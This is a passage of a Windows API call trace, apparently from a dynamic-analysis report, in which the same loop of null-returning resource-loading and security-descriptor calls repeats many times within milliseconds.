0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.963] LockResource (hResData=0x0) returned 0x0 [0219.963] FreeResource (hResData=0x0) returned 0 [0219.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.964] LockResource (hResData=0x0) returned 0x0 [0219.964] FreeResource (hResData=0x0) returned 0 [0219.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.965] LockResource (hResData=0x0) returned 0x0 [0219.965] FreeResource (hResData=0x0) returned 0 [0219.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.966] LockResource (hResData=0x0) returned 0x0 [0219.966] FreeResource (hResData=0x0) returned 0 [0219.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.967] FreeResource (hResData=0x0) returned 0 [0219.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.967] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.968] LockResource (hResData=0x0) returned 0x0 [0219.968] FreeResource (hResData=0x0) returned 0 [0219.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.969] LockResource (hResData=0x0) returned 0x0 [0219.969] FreeResource (hResData=0x0) returned 0 [0219.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.970] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.970] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.970] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.970] LockResource (hResData=0x0) returned 0x0 [0219.970] FreeResource (hResData=0x0) returned 0 [0219.970] FindResourceA (hModule=0x400000, lpName=0x0, 